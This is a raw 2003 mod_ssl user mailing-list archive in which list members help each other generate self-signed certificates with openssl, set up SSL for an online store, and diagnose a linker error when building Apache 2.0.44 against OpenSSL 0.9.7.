Thanks. But I'm not clear about how to obtain encrytpion on the server and client side . Also, are there any tools to create Digital certificates becasue i need a self signed certificate. 
My configurations:
Server: Apache web server with Modssl enabled on Linux platform
client: internet explorer 5.0, netscape 6.0
programming language to be used for encryption: Java
 
 
 
 Justin Williams  wrote: Thawte.com, actually, has a great step-by-step on this one  That's where the following comes from:1- make sure you know the full domain name (https://www.domain.com)2- pick 5 random files that are of moderate size (I use about a 5K file).  Thawte refers to these files as file1:file2:file3...3- generate the key as follows:openssl genrsa -des3 -rand file1:file2:file3:file4:file5 -out www.domain.com.key (you can leave out the -des3, if you are confident and secure about your server)4- generate the CSR from the key:openssl -req -new -key www.domain.com.key -out www.domain.com.csr (common name, when you are prompted, is not YOUR name, but the complete and entire domain name)5- generate a temporary, self-signed CRT from the CSR:openssl x509 -req -days 30 -in www.domain.com.csr -signkey www.domain.com.key -out www.domain.com.crt You will then send the CSR to the CA of your choice.  Whenthey send you the CRT back, replace your temporary CRT with the real one.----- Original Message ----- From: kulkarni veena To: modssl-users@modssl.org Sent: Wednesday, February 05, 2003 1:32 PMSubject: newbie: help to create ssl connection.

Hi,

I'm new to all this ssl thing and I wanted to create a ssl connection for online store using modssl. Could you please advice how do i get started?

Thanks in advance.

Veena Kulkarni



---------------------------------
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now


---------------------------------
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now
--0-1874040191-1044477134=:87556
Content-Type: text/html; charset=us-ascii


Thanks. But I'm not clear about how to obtain encrytpion on the server and client side . Also, are there any tools to create Digital certificates becasue i need a self signed certificate. 

My configurations:

Server: Apache web server with Modssl enabled on Linux platform

client: internet explorer 5.0, netscape 6.0

programming language to be used for encryption: Java

 

 

 

 Justin Williams <justin@naturalwebs.com> wrote: 






Thawte.com, actually, has a great step-by-step on this one  That's where the following comes from:


1- make sure you know the full domain name (https://www.domain.com)


2- pick 5 random files that are of moderate size (I use about a 5K file).  Thawte refers to these files as file1:file2:file3...


3- generate the key as follows:


openssl genrsa -des3 -rand file1:file2:file3:file4:file5 -out www.domain.com.key (you can leave out the -des3, if you are confident and secure about your server)


4- generate the CSR from the key:


openssl -req -new -key www.domain.com.key -out www.domain.com.csr (common name, when you are prompted, is not YOUR name, but the complete and entire domain name)


5- generate a temporary, self-signed CRT from the CSR:


openssl x509 -req -days 30 -in www.domain.com.csr -signkey www.domain.com.key -out www.domain.com.crt


 


You will then send the CSR to the CA of your choice.  Whenthey send you the CRT back, replace your temporary CRT with the real one.




----- Original Message ----- 




Sent: Wednesday, February 05, 2003 1:32 PM


Subject: newbie: help to create ssl connection.





Hi,


I'm new to all this ssl thing and I wanted to create a ssl connection for online store using modssl. Could you please advice how do i get started?


Thanks in advance.


Veena Kulkarni






Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now

Do you Yahoo!?

Yahoo! Mail Plus - Powerful. Affordable. Sign up now
--0-1874040191-1044477134=:87556--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  5 21:43:17 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DFBB42AA09A; Wed,  5 Feb 2003 21:43:16 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from vopmail.pshift.com (mail.pshift.com [63.166.217.30])
	by master.modssl.org (Postfix) with ESMTP id 040E02AA095
	for ; Wed,  5 Feb 2003 21:43:05 +0100 (CET)
Received: from WKSJustin (unverified [63.166.217.49]) by vopmail.pshift.com
 (Vircom SMTPRS 1.4.230) with ESMTP id  for ;
 Wed, 5 Feb 2003 15:38:34 -0500
Message-ID: <00b001c2cd57$3050dd90$6700a8c0@WKSJustin>
From: "Justin Williams" 
To: 
References: <20030205203214.87836.qmail@web41503.mail.yahoo.com>
Subject: Re: newbie: help to create ssl connection.
Date: Wed, 5 Feb 2003 15:43:07 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_00AD_01C2CD2D.476C7DB0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Justin Williams" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00AD_01C2CD2D.476C7DB0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

That is a set of directions on creating your self-signed certificate.

As far as encryption, what, exactly, are you trying to accomplish?
  ----- Original Message -----=20
  From: kulkarni veena=20
  To: modssl-users@modssl.org=20
  Sent: Wednesday, February 05, 2003 3:32 PM
  Subject: Re: newbie: help to create ssl connection.


  Thanks. But I'm not clear about how to obtain encrytpion on the server =
and client side . Also, are there any tools to create Digital =
certificates becasue i need a self signed certificate.=20

  My configurations:=20

  Server: Apache web server with Modssl enabled on Linux platform=20

  client: internet explorer 5.0, netscape 6.0=20

  programming language to be used for encryption: Java=20

  =20

  =20


   Justin Williams  wrote:=20

    Thawte.com, actually, has a great step-by-step on this one  That's =
where the following comes from:
    1- make sure you know the full domain name (https://www.domain.com)
    2- pick 5 random files that are of moderate size (I use about a 5K =
file).  Thawte refers to these files as file1:file2:file3...
    3- generate the key as follows:
    openssl genrsa -des3 -rand file1:file2:file3:file4:file5 -out =
www.domain.com.key (you can leave out the -des3, if you are confident =
and secure about your server)
    4- generate the CSR from the key:
    openssl -req -new -key www.domain.com.key -out www.domain.com.csr =
(common name, when you are prompted, is not YOUR name, but the complete =
and entire domain name)
    5- generate a temporary, self-signed CRT from the CSR:
    openssl x509 -req -days 30 -in www.domain.com.csr -signkey =
www.domain.com.key -out www.domain.com.crt

    You will then send the CSR to the CA of your choice.  Whenthey send =
you the CRT back, replace your temporary CRT with the real one.
      ----- Original Message -----=20
      From: kulkarni veena=20
      To: modssl-users@modssl.org=20
      Sent: Wednesday, February 05, 2003 1:32 PM
      Subject: newbie: help to create ssl connection.


      Hi,

      I'm new to all this ssl thing and I wanted to create a ssl =
connection for online store using modssl. Could you please advice how do =
i get started?

      Thanks in advance.

      Veena Kulkarni





-------------------------------------------------------------------------=
-
      Do you Yahoo!?
      Yahoo! Mail Plus - Powerful. Affordable. Sign up now




-------------------------------------------------------------------------=
-----
  Do you Yahoo!?
  Yahoo! Mail Plus - Powerful. Affordable. Sign up now
------=_NextPart_000_00AD_01C2CD2D.476C7DB0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable







That is a set of directions on creating =
your=20
self-signed certificate.


 


As far as encryption, what, exactly, =
are you trying=20
to accomplish?


  
----- Original Message ----- 

  From:=20
  kulkarni=20
  veena 

  
  
Sent: Wednesday, February 05, =
2003 3:32=20
  PM

  
Subject: Re: newbie: help to =
create ssl=20
  connection.

  


  
Thanks. But I'm not clear about how to obtain encrytpion on the =
server and=20
  client side . Also, are there any tools to create Digital certificates =
becasue=20
  i need a self signed certificate.=20
  
My configurations:=20
  
Server: Apache web server with Modssl enabled on Linux platform=20
  
client: internet explorer 5.0, netscape 6.0=20
  
programming language to be used for encryption: Java=20
  
=20
  
=20
  

  
 Justin Williams <justin@naturalwebs.com> =
wrote:=20
  
    
    

    
Thawte.com, actually, has a great =
step-by-step=20
    on this one  That's where the following comes =
from:

    
1- make sure you know the full =
domain name (https://www.domain.com)
=

    
2- pick 5 random files that are of =
moderate=20
    size (I use about a 5K file).  Thawte refers to these files as=20
    file1:file2:file3...

    
3- generate the key as =
follows:

    
openssl genrsa -des3 -rand=20
    file1:file2:file3:file4:file5 -out www.domain.com.key (you can =
leave out=20
    the -des3, if you are confident and secure about your =
server)

    
4- generate the CSR from the =
key:

    
openssl -req -new -key www.domain.com.key -out www.domain.com.csr (common =
name, when=20
    you are prompted, is not YOUR name, but the complete and entire =
domain=20
    name)

    
5- generate a temporary,=20
    self-signed CRT from the CSR:

    
openssl x509 -req -days 30 -in www.domain.com.csr -signkey =
www.domain.com.key -out www.domain.com.crt

    
 

    
You will then send the CSR to the =
CA of your=20
    choice.  Whenthey send you the CRT back, replace your temporary =
CRT=20
    with the real one.

    
      
----- Original Message ----- =


      From:=20
      kulkarni=20
      veena 
      
      
Sent: Wednesday, February =
05, 2003=20
      1:32 PM

      
Subject: newbie: help to =
create ssl=20
      connection.

      


      
Hi,

      
I'm new to all this ssl thing and I wanted to create a ssl =
connection=20
      for online store using modssl. Could you please advice how do i =
get=20
      started?

      
Thanks in advance.

      
Veena Kulkarni

      


      

      Do you Yahoo!?
Yaho=
o!=20
      Mail Plus - Powerful. Affordable. Sign=
 up=20
      now
  


  

  Do you Yahoo!?
Yaho=
o! Mail=20
  Plus - Powerful. Affordable. Sign=
 up=20
  now

------=_NextPart_000_00AD_01C2CD2D.476C7DB0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb  6 01:17:14 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 174472AA0A8; Thu,  6 Feb 2003 01:17:14 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from web41506.mail.yahoo.com (web41506.mail.yahoo.com [66.218.93.89])
	by master.modssl.org (Postfix) with SMTP id A9AAE2AA065
	for ; Thu,  6 Feb 2003 01:17:11 +0100 (CET)
Message-ID: <20030206001709.36641.qmail@web41506.mail.yahoo.com>
Received: from [204.31.165.161] by web41506.mail.yahoo.com via HTTP; Wed, 05 Feb 2003 16:17:09 PST
Date: Wed, 5 Feb 2003 16:17:09 -0800 (PST)
From: kulkarni veena 
Subject: Re: newbie: help to create ssl connection.
To: modssl-users@modssl.org
In-Reply-To: <00b001c2cd57$3050dd90$6700a8c0@WKSJustin>
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-82625841-1044490629=:36340"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: kulkarni veena 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-82625841-1044490629=:36340
Content-Type: text/plain; charset=us-ascii


I'm trying to create an online store which will have a secured login and also secured transaction for payment processing.
 
 Justin Williams  wrote:That is a set of directions on creating your self-signed certificate. As far as encryption, what, exactly, are you trying to accomplish?----- Original Message ----- From: kulkarni veena To: modssl-users@modssl.org Sent: Wednesday, February 05, 2003 3:32 PMSubject: Re: newbie: help to create ssl connection.

Thanks. But I'm not clear about how to obtain encrytpion on the server and client side . Also, are there any tools to create Digital certificates becasue i need a self signed certificate. 
My configurations: 
Server: Apache web server with Modssl enabled on Linux platform 
client: internet explorer 5.0, netscape 6.0 
programming language to be used for encryption: Java 



 Justin Williams  wrote: Thawte.com, actually, has a great step-by-step on this one  That's where the following comes from:1- make sure you know the full domain name (https://www.domain.com)2- pick 5 random files that are of moderate size (I use about a 5K file).  Thawte refers to these files as file1:file2:file3...3- generate the key as follows:openssl genrsa -des3 -rand file1:file2:file3:file4:file5 -out www.domain.com.key (you can leave out the -des3, if you are confident and secure about your server)4- generate the CSR from the key:openssl -req -new -key www.domain.com.key -out www.domain.com.csr (common name, when you are prompted, is not YOUR name, but the complete and entire domain name)5- generate a temporary, self-signed CRT from the CSR:openssl x509 -req -days 30 -in www.domain.com.csr -signkey www.domain.com.key -out www.domain.com.crt You will then send the CSR to the CA of your choice.  Whenthey send you the CRT back, replace your temporary CRT with the real one.----- Original Message ----- From: kulkarni veena To: modssl-users@modssl.org Sent: Wednesday, February 05, 2003 1:32 PMSubject: newbie: help to create ssl connection.

Hi,

I'm new to all this ssl thing and I wanted to create a ssl connection for online store using modssl. Could you please advice how do i get started?

Thanks in advance.

Veena Kulkarni



---------------------------------
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now


---------------------------------
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now


---------------------------------
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now
--0-82625841-1044490629=:36340
Content-Type: text/html; charset=us-ascii


I'm trying to create an online store which will have a secured login and also secured transaction for payment processing.

 

 Justin Williams <justin@naturalwebs.com> wrote:




That is a set of directions on creating your self-signed certificate.


 


As far as encryption, what, exactly, are you trying to accomplish?




----- Original Message ----- 




Sent: Wednesday, February 05, 2003 3:32 PM


Subject: Re: newbie: help to create ssl connection.





Thanks. But I'm not clear about how to obtain encrytpion on the server and client side . Also, are there any tools to create Digital certificates becasue i need a self signed certificate. 

My configurations: 

Server: Apache web server with Modssl enabled on Linux platform 

client: internet explorer 5.0, netscape 6.0 

programming language to be used for encryption: Java 







 Justin Williams <justin@naturalwebs.com> wrote: 






Thawte.com, actually, has a great step-by-step on this one  That's where the following comes from:


1- make sure you know the full domain name (https://www.domain.com)


2- pick 5 random files that are of moderate size (I use about a 5K file).  Thawte refers to these files as file1:file2:file3...


3- generate the key as follows:


openssl genrsa -des3 -rand file1:file2:file3:file4:file5 -out www.domain.com.key (you can leave out the -des3, if you are confident and secure about your server)


4- generate the CSR from the key:


openssl -req -new -key www.domain.com.key -out www.domain.com.csr (common name, when you are prompted, is not YOUR name, but the complete and entire domain name)


5- generate a temporary, self-signed CRT from the CSR:


openssl x509 -req -days 30 -in www.domain.com.csr -signkey www.domain.com.key -out www.domain.com.crt


 


You will then send the CSR to the CA of your choice.  Whenthey send you the CRT back, replace your temporary CRT with the real one.




----- Original Message ----- 




Sent: Wednesday, February 05, 2003 1:32 PM


Subject: newbie: help to create ssl connection.





Hi,


I'm new to all this ssl thing and I wanted to create a ssl connection for online store using modssl. Could you please advice how do i get started?


Thanks in advance.


Veena Kulkarni






Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now






Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now

Do you Yahoo!?

Yahoo! Mail Plus - Powerful. Affordable. Sign up now
--0-82625841-1044490629=:36340--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb  6 09:49:48 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E94742AA0A8; Thu,  6 Feb 2003 09:49:47 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.liu.se (mail.liu.se [130.236.1.35])
	by master.modssl.org (Postfix) with ESMTP id 054242AA065
	for ; Thu,  6 Feb 2003 09:49:46 +0100 (CET)
Received: by mail.liu.se (Postfix, from userid 506)
	id DAD961FEA5; Thu,  6 Feb 2003 09:49:36 +0100 (CET)
Received: from elysium.student.liu.se (elysium.student.liu.se [130.236.230.91])
	by mail.liu.se (Postfix) with ESMTP id 71A231FEC0
	for ; Thu,  6 Feb 2003 09:49:35 +0100 (CET)
Received: by elysium.student.liu.se (Postfix, from userid 102)
	id A855822E46; Thu,  6 Feb 2003 09:49:29 +0100 (MET)
Received: from unit.liu.se (okoze.unit.liu.se [130.236.1.164])
	by elysium.student.liu.se (Postfix) with ESMTP id 28EE422E46
	for ; Thu,  6 Feb 2003 09:49:27 +0100 (MET)
Message-ID: <3E422196.40803@unit.liu.se>
Date: Thu, 06 Feb 2003 09:49:26 +0100
From: Erik Melkersson 
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4us; en-US; rv:1.1) Gecko/20020827
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Problems compiling mod_ssl with apache 2.0.44
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
X-Spam-Status: No, hits=-2.3 required=5.0
	tests=SIGNATURE_SHORT_DENSE,SPAM_PHRASE_00_01,USER_AGENT,
	      USER_AGENT_MOZILLA_UA,X_ACCEPT_LANG
	version=2.41-liu_1.3
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Erik Melkersson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi!
(Sending this again after finally succesfully subscribing, so sorry if 
you get it twice)

I'm trying to compile Apache 2.0.44 with mod_ssl and have some problems.

I've downloaded and installed openssl-0.9.7. Using:
./config --prefix=/service/apache2/openssl/
--openssldir=/service/apache2/openssl/
I could use those files to compile cadaver.

But when I try to compile apache:
./configure --prefix=/service/apache2
--exec-prefix=/service/apache2/arch/linux-intel --enable-dav
--enable-ssl --with-ssl=/service/apache2/openssl/
...a lot of rows...
make
...a lot of rows...
/bin/sh /usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/libtool
--silent --mode=link gcc  -g -O2 -pthread    -DLINUX=2 -D_REENTRANT
-D_XOPEN_SOURCE=500 -D_BSD_SOURCE -D_SVID_SOURCE
-DAP_HAVE_DESIGNATED_INITIALIZER
-I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/include
-I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/include
-I/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/lib
-I. -I/usr/local/service/apache2/src/httpd-2.0.44/os/unix
-I/usr/local/service/apache2/src/httpd-2.0.44/server/mpm/prefork
-I/usr/local/service/apache2/src/httpd-2.0.44/modules/http
-I/usr/local/service/apache2/src/httpd-2.0.44/modules/filters
-I/usr/local/service/apache2/src/httpd-2.0.44/modules/proxy
-I/usr/local/service/apache2/src/httpd-2.0.44/include
-I/service/apache2/openssl//include/openssl
-I/service/apache2/openssl//include
-I/usr/local/service/apache2/src/httpd-2.0.44/modules/dav/main
-export-dynamic
-L/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/lib
-L/service/apache2/openssl//lib   -o httpd  modules.lo
modules/aaa/mod_access.la modules/aaa/mod_auth.la
modules/filters/mod_include.la modules/loggers/mod_log_config.la
modules/metadata/mod_env.la modules/metadata/mod_setenvif.la
modules/ssl/mod_ssl.la modules/http/mod_http.la modules/http/mod_mime.la
modules/dav/main/mod_dav.la modules/generators/mod_status.la
modules/generators/mod_autoindex.la modules/generators/mod_asis.la
modules/generators/mod_cgi.la modules/dav/fs/mod_dav_fs.la
modules/mappers/mod_negotiation.la modules/mappers/mod_dir.la
modules/mappers/mod_imap.la modules/mappers/mod_actions.la
modules/mappers/mod_userdir.la modules/mappers/mod_alias.la
modules/mappers/mod_so.la server/mpm/prefork/libprefork.la
server/libmain.la os/unix/libos.la -lssl -lcrypto
/usr/local/service/apache2/src/httpd-2.0.44/srclib/pcre/libpcre.la
/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/libaprutil-0.la
-lgdbm -ldb
/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr-util/xml/expat/lib/libexpat.la 

/usr/local/service/apache2/src/httpd-2.0.44/srclib/apr/libapr-0.la -lm
-lcrypt -lnsl -lresolv -ldl
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_X509_INFO_value'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_X509_NAME_value'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_X509_NAME_push'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_SSL_CIPHER_num'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_X509_NAME_num'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_SSL_CIPHER_value'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_X509_pop_free'
modules/ssl/.libs/mod_ssl.so: undefined reference to
`sk_X509_NAME_ENTRY_num'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_SSL_CIPHER_dup'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_X509_REVOKED_value'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_X509_INFO_num'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_X509_value'
modules/ssl/.libs/mod_ssl.so: undefined reference to
`sk_X509_NAME_ENTRY_value'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_X509_num'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_SSL_CIPHER_free'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_X509_INFO_pop_free'
modules/ssl/.libs/mod_ssl.so: undefined reference to
`sk_X509_NAME_set_cmp_func'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_X509_push'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_X509_NAME_free'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_X509_INFO_new_null'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_X509_NAME_new'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_X509_NAME_find'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_X509_REVOKED_num'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_SSL_CIPHER_find'
modules/ssl/.libs/mod_ssl.so: undefined reference to `sk_X509_INFO_free'
modules/ssl/.libs/mod_ssl.so: undefined reference to `OPENSSL_free'
collect2: ld returned 1 exit status
make[1]: *** [httpd] Error 1
make[1]: Leaving directory `/usr/local/service/apache2/src/httpd-2.0.44'
make: *** [all-recursive] Error 1

Am I missing a lib or something that should have the sk_-stuff?
Some help would be appreciated?

Regards Erik Melkersson

-- 
__________________________
Erik Melkersson, Technical Webmaster
UNIT, Linköpings Universitet
melker@unit.liu.se, 013-285794
http://www.unit.liu.se/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb  6 20:18:41 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AC0212AA0A8; Thu,  6 Feb 2003 20:18:41 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from VL-MS-MR004.sc1.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id 17CB02AA0A9
	for ; Thu,  6 Feb 2003 20:18:40 +0100 (CET)
Received: from steerpike.geoffthorpe.net ([24.203.229.101])
 by VL-MS-MR004.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 1.10 (built Jan 23 2003))
 with SMTP id <0H9W00GQCJ14C7@VL-MS-MR004.sc1.videotron.ca> for
 modssl-users@modssl.org; Thu, 06 Feb 2003 14:19:53 -0500 (EST)
Received: by steerpike.geoffthorpe.net (sSMTP sendmail emulation); Thu,
 06 Feb 2003 14:18:25 -0500
Date: Thu, 06 Feb 2003 14:18:25 -0500
From: Geoff Thorpe 
Subject: Re: Problems compiling mod_ssl with apache 2.0.44
In-reply-to: <3E422196.40803@unit.liu.se>
To: modssl-users@modssl.org
Message-id: <20030206191825.GC1848@grumpy.geoffnet>
X-Info: http://www.geoffthorpe.net
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
Content-disposition: inline
User-Agent: Mutt/1.4i
X-Editor: Vim http://www.vim.org/
References: <3E422196.40803@unit.liu.se>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

My first guess would be that you have another version of openssl
libraries and/or headers installed on your system. The kind of linker
error you report usually suggests the code was compiled against one
openssl version's headers, but is trying to link against a different
openssl version's libraries. If my hunch is right, you have an older
version of openssl installed on the system and your code is using the
older version's headers but trying to link against your 0.9.7
installation in /service/apache2/openssl.

I can't test any of this right now so I'm flying a little blind, but
here's a couple of ideas;

(1) If you can (even temporarily) move the system's existing openssl
headers (and libs, for safety) out of the way and try again, you would
see if apache finds the correct headers and libs for sure.

(2) Try forcing the include path in a different way, eg; configure
    apache2 like;
    # export CFLAGS="-I/service/apache2/openssl/include"
    # ./configure --prefix=/service/apache2/ 

Good luck,
Geoff

PS: If that leads nowhere, you may want to post your query to one of the
apache2 mailing lists - a version of mod_ssl is now included there and
this sort of configuration issue is quite different between adding
mod_ssl to apache 1.3 and using apache2's builtin version.

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb  7 02:14:21 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0A1FB2AA0A3; Fri,  7 Feb 2003 02:14:21 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from jmp1.us.vipdev.com (jmp1.us.vipdev.com [67.112.6.137])
	by master.modssl.org (Postfix) with ESMTP id BCACE2AA065
	for ; Fri,  7 Feb 2003 02:14:18 +0100 (CET)
Received: from jmp1.us.vipdev.com (localhost [127.0.0.1])
	by jmp1.us.vipdev.com (8.12.6/8.12.6) with ESMTP id h171EHkE006303
	for ; Thu, 6 Feb 2003 17:14:17 -0800 (PST)
Received: from localhost (fliu@localhost)
	by jmp1.us.vipdev.com (8.12.6/8.12.6/Submit) with ESMTP id h171EGXA006300
	for ; Thu, 6 Feb 2003 17:14:16 -0800 (PST)
X-Authentication-Warning: usdjmp1.us.vipdev.com: fliu owned process doing -bs
Date: Thu, 6 Feb 2003 17:14:16 -0800 (PST)
From: Frank Liu 
X-X-Sender: fliu@usdjmp1
To: modssl-users@modssl.org
Subject: modssl/pkg.contrib
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Frank Liu 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


sorry, somehow I cut/paste the wrong email address and sent
the following to the announce list.
frank

---------- Forwarded message ----------
Date: Thu, 6 Feb 2003 16:56:54 -0800 (PST)
From: Frank Liu 
To: modssl-announce@modssl.org
Subject: modssl/pkg.contrib


I am trying to use modssl/pkg.contrib to sign my own certificate.
It has been working fine. recently I found I could NOT re-sign
the CSR from the same URL.
eg: I generated a CSR for www.test.mydomain.com and same it in z.csr
./sign.sh z.csr    works fine.
after a few weeks, I deleted and re-installed the webserver
for www.test.mydomain.com, and a new z.csr was generated for
the new installation.
./sign.sh z.csr
...
Sign the certificate? [y/n]:y
failed to update database
TXT_DB error number 2
CA verifying: z.crt <-> CA cert
unable to load certificate
5835:error:0906D06C:PEM routines:PEM_read_bio:no start
line:pem_lib.c:632:Expecting: TRUSTED CERTIFICATE

$ openssl version
OpenSSL 0.9.7 31 Dec 2002

Any ideas?


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb  7 10:26:23 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5DBB72AA0AE; Fri,  7 Feb 2003 10:26:23 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.liu.se (mail.liu.se [130.236.1.35])
	by master.modssl.org (Postfix) with ESMTP id 79E2E2AA065
	for ; Fri,  7 Feb 2003 10:26:17 +0100 (CET)
Received: by mail.liu.se (Postfix, from userid 506)
	id EC43E1FEFF; Fri,  7 Feb 2003 10:25:55 +0100 (CET)
Received: from xanadu.student.liu.se (xanadu.student.liu.se [130.236.230.93])
	by mail.liu.se (Postfix) with ESMTP id 1483C1FF05
	for ; Fri,  7 Feb 2003 10:25:55 +0100 (CET)
Received: by xanadu.student.liu.se (Postfix, from userid 102)
	id DBD8247439; Fri,  7 Feb 2003 10:25:53 +0100 (MET)
Received: from unit.liu.se (okoze.unit.liu.se [130.236.1.164])
	by xanadu.student.liu.se (Postfix) with ESMTP id 9C5164741E
	for ; Fri,  7 Feb 2003 10:25:51 +0100 (MET)
Message-ID: <3E437B9F.5090208@unit.liu.se>
Date: Fri, 07 Feb 2003 10:25:51 +0100
From: Erik Melkersson 
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4us; en-US; rv:1.1) Gecko/20020827
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problems compiling mod_ssl with apache 2.0.44
References: <3E422196.40803@unit.liu.se> <20030206191825.GC1848@grumpy.geoffnet>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
X-Spam-Status: No, hits=-8.5 required=5.0
	tests=QUOTED_EMAIL_TEXT,REFERENCES,SIGNATURE_SHORT_DENSE,
	      SPAM_PHRASE_00_01,USER_AGENT,USER_AGENT_MOZILLA_UA,
	      X_ACCEPT_LANG
	version=2.41-liu_1.3
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Erik Melkersson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi!

Thanks for the reply.

Geoff Thorpe wrote:
> ... The kind of linker
> error you report usually suggests the code was compiled against one
> openssl version's headers, but is trying to link against a different
